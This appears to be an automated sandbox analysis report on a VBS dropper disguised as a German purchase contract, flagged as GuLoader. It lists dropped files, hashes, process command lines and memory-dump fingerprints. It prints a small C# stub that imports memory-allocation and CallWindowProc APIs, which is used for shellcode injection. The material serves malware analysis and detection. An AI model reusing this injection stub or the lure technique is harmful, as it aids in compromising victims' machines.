                SHA-512:A0C0B0B751083E80414167F26C252621A611B3B6071D24E6979DA92594B939759B65947DEE1EC97613CEC00840B835101AADD09B7F425D86C02A8B3848142B29
                Malicious:false
                Reputation:low
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.075622557496499
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry46ak7YnqqJLPN5Dlq5J:+RI+ycuZhNW6akSJLPNnqX
                MD5:384EEE4FB1D851BF505F99A9B0E57181
                SHA1:A05EB6B97B7CC034189F6C4CFC254170BDC30031
                SHA-256:EEB56A26B02324A42D7658541E8212A66F2E14703828BF69FF5C5ACFC33B209D
                SHA-512:ABADFE65F9EA390F249C8835179DAFE4173FB691BA6014413492A4E3C9E0DAFFE2EBA1F180A787E1E8CE4CE1EAAD0317053EDB1D9D8B2D16A97300DA3BF4609E
                Malicious:false
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                Category:dropped
                Size (bytes):490
                Entropy (8bit):5.177061534453094
                Encrypted:false
                SSDEEP:12:V/DGrJonWvLRCSEYo9FMwQiP2HLlPJV7xRffnLR5:JomnWvLRCSEYk++SHFRffnf
                MD5:6EF217E1B387262CD37C8871BD75207A
                SHA1:D3D9DBD4C81658B7A1F9F0F99EBC4FF4F00C0D26
                SHA-256:38905131EE1E1DDEF2A4BC7CB49F29B1FF449275C3B21BE90AF10F2232052D57
                SHA-512:136AE87623D223CCA114A472897E28B4E663BBF9612F3E232B564DDBCCADD0D7F57A5EEDC7521267F7D4BDDEC469B10963AFAA7FE2BD27537F83BFDBD1612E09
                Malicious:false
                Preview:.using System;..using System.Runtime.InteropServices;..public static class SYDYEMENIT1..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);..[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);..}
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):375
                Entropy (8bit):5.167077461780711
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fKT7ShGzxs7+AEszIN723fKT7Shb:p37Lvkmb6K2ayT7SkWZETayT7Sh
                MD5:F51709B660769C5A6D24A77C2713B8DD
                SHA1:54F95ED0DCB25E8EAAC31EBB1F16D84B78D12CE3
                SHA-256:B2239B636A6ECE195DDC68CB33CBD00D3D4664F5926EF0B9B02834F50F44B35E
                SHA-512:2F6D95A84770A6888743036B73D9CDCE22D8B63327DC184D0E335AA5F49128EAED3F0EFD73A615D55FA5F2A9D37C8D1ABD5A725A637F6D8E12DF2A18C31689D7
                Malicious:false
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.0.cs"
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):2.822015607551872
                Encrypted:false
                SSDEEP:48:6Ebjculb52Kql4QF9Bh+bB1ulW6a3Jhq:tjTlj4Mb6I6KJ
                MD5:C89CA164F91806FC6CD720DCB1639020
                SHA1:05C816C875AFA744A47B478D84B475CD077B9DFD
                SHA-256:BAF76CC4091AF701AE37AB4306513D2645B8C574BC684D89516EE65FC7748BD3
                SHA-512:26AA7FD7AFEDCEE559CBEFBE13DD89AA9586AAF9A7EAC5C8BEA33938DE83ACC736D9A07EA4C0152615EE4C26F8BE3ADA7E2DEA8EC4D5C28AC9BA51FA60992500
                Malicious:false
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                Category:modified
                Size (bytes):876
                Entropy (8bit):5.279994811624406
                Encrypted:false
                SSDEEP:24:KOuqd3ka6K2abETaGKaM5DqBVKVrdFAMBJTH:yika6CbE+GKxDcVKdBJj
                MD5:A7E8A5B7CF6BF7429048FF556BC26DF2
                SHA1:6386089365DB04C3EA2F64D1D40D2FC45B6BB57A
                SHA-256:9A0D035F647943A3FC22471BC08AB12AE7120D8ABAB7150C08088B0F7F6A0FA0
                SHA-512:79A101445563B976C097530C549A9135F6D7EF2AB33679DDA5E1B1C0FA6A830F9500DFA9FBA8E9BCF0A95A57A948D0EA1CF21A79B953835B997E8C2870852BBF
                Malicious:false
                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):11548
                Entropy (8bit):5.195439260420691
                Encrypted:false
                SSDEEP:96:BZhTLSNnSm1TrwMFFyd1sXniC2JQwLkT14Nb84UdYoLbqDo1ZhZBTLSNnSm1Trw5:ghS2nljiNbpoihS2nljiNbpozMfkoLrz
                MD5:20F10E2B7E09DE3D7C26D563B062E59C
                SHA1:681CC3ECD89789721C2E973410BD89D74C0221B9
                SHA-256:330D80522C9691DAFB1ADC78FEAC832818D9E0EBAEBD5C456F7E5F3D1BC70945
                SHA-512:CBB70E9A7D6CF524E706ECA43DCF1762F77576E78CE60A3F87A79CB5B67CD0575525BEDB993439D4BA15B6A772C07FC18B0A57D1B16D5E3AFC7BED34A719816A
                Malicious:false
                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220126150156..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813435 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoExit -EncodedCommand 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
                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.18100071720658
                TrID:
                  File name:tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
                  File size:91200
                  MD5:b8fbb413a49b2f05872cb38372454664
                  SHA1:2071d3476c94b3cfc924b31c705806e78df674a8
                  SHA256:cffa320db9834e3f224aa5961073fc9d0cb14f34c6430ffa2d7468da7da7ce32
                  SHA512:0145657682bbd7ba45f2c8f512ee11553ebaf20eeffb47f271f0e1b7e5882248488509e5ba6a789ef41d60e76acbb7a94110491a592359b2db4671f1bc3d759f
                  SSDEEP:1536:co8xz3WxNqaStVyjKT9MYxFc87GPm3Uggbnins:clxz3WbmdSYxFJagBgbis
                  File Content Preview:'benedick snee Bandanasd4 Parasitadr brontean Udtry Jvningern1 mhorrco thoriated kult Nunti stnke Antiparab ROVSING PALEOANTH udfordring TUNGM KRONPRINS precon TEGNING Ablatitio ESOTE STVN ..'strans Unca5 CAPRIFI Obbligato1 isce Raiiformn2 Bluchersbi6 Ren
                  Icon Hash:e8d69ece869a9ec4
                  No network behavior found

                  Target ID:1
                  Start time:15:01:14
                  Start date:26/01/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
                  Imagebase:0x7ff62b150000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:5
                  Start time:15:01:26
                  Start date:26/01/2022
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "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
                  Imagebase:0xd30000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  Target ID:6
                  Start time:15:01:27
                  Start date:26/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:18
                  Start time:15:02:28
                  Start date:26/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
                  Imagebase:0x3b0000
                  File size:2170976 bytes
                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:moderate

                  Target ID:19
                  Start time:15:02:31
                  Start date:26/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP"
                  Imagebase:0xbe0000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 76050c40bb76dc63309c2931752d62df5e44ff530750f412e6999a8c017e2f43
                    • Instruction ID: 246f85e9d9c0582d9f5c0b8b4b9bb0a6bc985bc878c649e5d69b3f9e27bc6f13
                    • Opcode Fuzzy Hash: 76050c40bb76dc63309c2931752d62df5e44ff530750f412e6999a8c017e2f43
                    • Instruction Fuzzy Hash: 4F21B6357107008BC724EB6CC4845AABBEAAFC93267148A7DD55ACF751DF72EC428B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 421ae2f8df8eb9e835f53be701555e8ebd9d49cc31aeb70572d1ebedb9274171
                    • Instruction ID: f8010a721fcc823e23ac19faa11ae188465c68a20e9832252fc660510be64adb
                    • Opcode Fuzzy Hash: 421ae2f8df8eb9e835f53be701555e8ebd9d49cc31aeb70572d1ebedb9274171
                    • Instruction Fuzzy Hash: 9331D875E112089FCB14DFA9D9849EEBBF6FF88310B258059D905AB365D731AC81CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 711d0421bb54748e252489582ad1217c9931c27fadf8b961e4c16cdb8d7a56a3
                    • Instruction ID: ceaa18769726278fe97cce6a9b6377ebf04cb5a5b8b6c999b7756bb0f5d9717e
                    • Opcode Fuzzy Hash: 711d0421bb54748e252489582ad1217c9931c27fadf8b961e4c16cdb8d7a56a3
                    • Instruction Fuzzy Hash: D0213079E102089FCB14DFA9D5849DDB7F2FF88310B258195D915AB365DB31EC81CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03a9294447cc444ba94058a79bc9b8c7425cb003a7252cd73e75ee5674edcd6c
                    • Instruction ID: 04d507e73bdd0fea144d350d67306493ebb7a487a20bad9f0ed21db5815b726b
                    • Opcode Fuzzy Hash: 03a9294447cc444ba94058a79bc9b8c7425cb003a7252cd73e75ee5674edcd6c
                    • Instruction Fuzzy Hash: 0221C435A10209EFCF41DF98D885EDDBBB2BF48214F288448E904AB361C775E892DB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 48bebebc049284fcc777bab6d8359e042978cc969851c4da482d25df118dd821
                    • Instruction ID: 23e9265d2a4d12bd715e756bd7d23caefb194e262e572028ab526e85b809cef8
                    • Opcode Fuzzy Hash: 48bebebc049284fcc777bab6d8359e042978cc969851c4da482d25df118dd821
                    • Instruction Fuzzy Hash: 7211DA74A002099FCB44EFB8D45499DBBF6EF89304F1149A9D50ADB360EB34A9008FA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fa93c97024989fd5ed58870e640fbb4e1e6772006e0ca3fe0ca7a7c1e63fb66c
                    • Instruction ID: 0b68050a4f2518803a8264e51a978b4c37af4fb4ccb2706af35306ba07a1fbae
                    • Opcode Fuzzy Hash: fa93c97024989fd5ed58870e640fbb4e1e6772006e0ca3fe0ca7a7c1e63fb66c
                    • Instruction Fuzzy Hash: A20128702007158BC720EFA9D440A5FB7AAFFC4258B154E2DDA0A8F340EF75AD0287D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f1849361ae121f24998c46aa64bba2a0ea8f75670b671c11e4ff693edada7b5f
                    • Instruction ID: 77b1d8d27273a31bf8ec64e570c0005cdc91b0ace30d22a59ab877f15225bb62
                    • Opcode Fuzzy Hash: f1849361ae121f24998c46aa64bba2a0ea8f75670b671c11e4ff693edada7b5f
                    • Instruction Fuzzy Hash: 5E0171756153049FC325CB29D888A6BFBF9FB95325B09806EE409CB362C774D885CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.876163626.000000000359D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0359D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c97a4a3a7604bbeb615ec054a295d513e15107f69ea6b3fa8e3117309476c7fd
                    • Instruction ID: 9f2362f79b4cbc42f0ce63cdf8e4b81140a4cd42044b7f07f1f8270c68b715b2
                    • Opcode Fuzzy Hash: c97a4a3a7604bbeb615ec054a295d513e15107f69ea6b3fa8e3117309476c7fd
                    • Instruction Fuzzy Hash: 0B01D4704083449AFF108B65EC847A6FBECFF41268F09855AED041B296E37A9805C6B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.876163626.000000000359D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0359D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 22a4f0a75b3157ecffc0ed42cc90f1291c54d7d3d3281cff69e848ccf07ce6a6
                    • Instruction ID: 1c67cbb0022e9d2c489aff556bb0c269ffbee544a9e13a9d593343c0386a3827
                    • Opcode Fuzzy Hash: 22a4f0a75b3157ecffc0ed42cc90f1291c54d7d3d3281cff69e848ccf07ce6a6
                    • Instruction Fuzzy Hash: 61012D6140D3C09FE7128B259C94A52BFB8AF43224F1D81CBD9848F2A7D2695849C772
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.887921924.0000000008240000.00000040.00000800.00020000.00000000.sdmp, Offset: 08240000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc734f5517d78d7b44ae9ac3b05567f78bc02e09e42912dd0d03bd4c70310a64
                    • Instruction ID: 083a95d81d24383953896dddd1d2374238fd9d653837b77a1e747fa5631d1866
                    • Opcode Fuzzy Hash: dc734f5517d78d7b44ae9ac3b05567f78bc02e09e42912dd0d03bd4c70310a64
                    • Instruction Fuzzy Hash: 6401A7613596C19FC756837860251997BB29FC7115B2E409BC581CF3A6CE218C46D3B3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 825f214b13aa2e9e7ae1c7f54c44deb7a94ed5a9b845ad0d5a781bc78fdc415e
                    • Instruction ID: a66d654bd79c28bfd0c0e30bce380d60e5083951ab43cd69cc2c0876df10d301
                    • Opcode Fuzzy Hash: 825f214b13aa2e9e7ae1c7f54c44deb7a94ed5a9b845ad0d5a781bc78fdc415e
                    • Instruction Fuzzy Hash: 3D01DF717052059FDB04DB78A8549DEBBF5EFE6214702893ED109CB7A1DB309C498B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12a96712ad83028855f43908ff2d2597c1b6e845c030e41ea15810b00951a217
                    • Instruction ID: a63112b4242f4f8fb6ad890ba95303eb8e407c3852240cdc98a73783817bc846
                    • Opcode Fuzzy Hash: 12a96712ad83028855f43908ff2d2597c1b6e845c030e41ea15810b00951a217
                    • Instruction Fuzzy Hash: 27F08C717102089FDB04EBA9A8409DFB7EAEBD5254702883AD209DB710DB309C458BE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 794390fb5d381bf9d5452ae69d285a8cb03617c5bec3f7011def5a925e0217a0
                    • Instruction ID: a811983115862cd3a22512a626f36ffec185e215699cff94dcb642078008ed87
                    • Opcode Fuzzy Hash: 794390fb5d381bf9d5452ae69d285a8cb03617c5bec3f7011def5a925e0217a0
                    • Instruction Fuzzy Hash: D801A475E5060ACFCB84DFA8C4859AEBBF1FF49310F508599DA09EB361D730A951CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b29c55268e92c5fb1ed5bdfbf64a2469b596d1d6f1b920c462630d36272f195f
                    • Instruction ID: 4548e6dd2c25d156cfcdfa0d29ef803fa90d76ce1c8f015f0bfc7af4101b5b03
                    • Opcode Fuzzy Hash: b29c55268e92c5fb1ed5bdfbf64a2469b596d1d6f1b920c462630d36272f195f
                    • Instruction Fuzzy Hash: 27F0F631914228DBCF14AF74C8596ED7BB6FB88301F040529D80277381CF795845CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.887921924.0000000008240000.00000040.00000800.00020000.00000000.sdmp, Offset: 08240000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a23c65c2d4e0c1e1627b13f1b670d55a22323b892999c4c24c4a2eca958bc6ca
                    • Instruction ID: 551ede91bdc432ba07d6a18a372ccac81327bc5fb7413d85eec8bfc9f225d97c
                    • Opcode Fuzzy Hash: a23c65c2d4e0c1e1627b13f1b670d55a22323b892999c4c24c4a2eca958bc6ca
                    • Instruction Fuzzy Hash: 20F0F6B4B403409FEB08DFA4846066AB7E7AFC9305F24C559C8025F394CE71DC068751
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c29aae97fd72a58996925725383def41a1d1a4954d149902a7a27ce8a7ad3948
                    • Instruction ID: ee4b023b74c4e90aaf22e8485864b36f23ed262025313ce30fe879b5a4338396
                    • Opcode Fuzzy Hash: c29aae97fd72a58996925725383def41a1d1a4954d149902a7a27ce8a7ad3948
                    • Instruction Fuzzy Hash: BEF0CF3210014DBBCF52AF85DC00CDE3F7AFF88654B458919FA4846220C672D861EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: be59cc6b5cce230a72c1e7d08b1ef5b6e01947e1d2d092c5004c7736d6ca139b
                    • Instruction ID: 952fef6b4e2ac663bb85f30a57a726d56deed4e1782a06d468d634ce62564b2b
                    • Opcode Fuzzy Hash: be59cc6b5cce230a72c1e7d08b1ef5b6e01947e1d2d092c5004c7736d6ca139b
                    • Instruction Fuzzy Hash: 25E02B363041402BCB066679A9244EABF9AAFC72207098067D945DB702CE708E06C3F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c3e969fb2e37bcd7140ced0466db38547a768a4831a2301b7e7ca601aa3644c
                    • Instruction ID: 72963d1b9d9ca500a410da5a82f0df52e3e6a9c2f92784bd0a6502be0888ae8e
                    • Opcode Fuzzy Hash: 8c3e969fb2e37bcd7140ced0466db38547a768a4831a2301b7e7ca601aa3644c
                    • Instruction Fuzzy Hash: 5BF0EC2830D3544FE741DB78F820695B7E59FC6215F0A80EBD545CB356DA78CC02C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 222080d998631416e19842f84f625feeabd664da346c134de7161c7858726a4a
                    • Instruction ID: af673dc47a4c8a4220d09af79715f7c68425c19ef9fe824d583f7104e00d5a77
                    • Opcode Fuzzy Hash: 222080d998631416e19842f84f625feeabd664da346c134de7161c7858726a4a
                    • Instruction Fuzzy Hash: B2F082319142299BDF149E64C8596EE7AB5FB89311F450529E802B7380CFB848408BD5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8545f389f89268ff31aa5c73dc684d07e36019b1d7fb92295d2e36e659f11991
                    • Instruction ID: 73338c1db4fd946d86f72e1c440f27fe72bc2d986688d015d69246eddb8a7720
                    • Opcode Fuzzy Hash: 8545f389f89268ff31aa5c73dc684d07e36019b1d7fb92295d2e36e659f11991
                    • Instruction Fuzzy Hash: 2DF0A974E1020A8FCB80DFA8C4859AEBBF5FF49214F504599D909DB321D730A951CFD1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e07ccff1dd30ad57c31fc4a537c89e30d961cf8f70127ef4ccbb6212fc6cd635
                    • Instruction ID: 3bcb8bd0b5d25011e532c856e4fe1e37b36c06f2eada34a9cdcec93d0deb72da
                    • Opcode Fuzzy Hash: e07ccff1dd30ad57c31fc4a537c89e30d961cf8f70127ef4ccbb6212fc6cd635
                    • Instruction Fuzzy Hash: BFF0B232100149ABCF42AF94D900CDA3BAAFF08294B405905FE4456120C676E960EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4923dab2dae58196c0de5a0d683f8abfbb519034b30a67270f646c8f5dd64e48
                    • Instruction ID: 1296c66d2c216e391e2852a5a02c1a7bcdbdfaab130e4dfd704f055ca6e04078
                    • Opcode Fuzzy Hash: 4923dab2dae58196c0de5a0d683f8abfbb519034b30a67270f646c8f5dd64e48
                    • Instruction Fuzzy Hash: 60D017367194245B82289A9EF84087AF79EDBC9A36318817FED0DD7740DA62EC03C6D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0ee0d1e3f30ae39c73840a9ebc87d4076fd60f8e32e27c392bc9adf71f5eda18
                    • Instruction ID: 7902496f9fc3ffc2e69bd7b22d570340b298e56bf6281511b9558e11e6ab9adf
                    • Opcode Fuzzy Hash: 0ee0d1e3f30ae39c73840a9ebc87d4076fd60f8e32e27c392bc9adf71f5eda18
                    • Instruction Fuzzy Hash: 3EE01A3160D3D16FC7176A70A82A095BF75DF47261F0A48AFD8828B253CA7A8D54C792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c23fbeee6fe208c73a7fbd9e066ad19049a1ac78d92db90bd4c388f568b0aa26
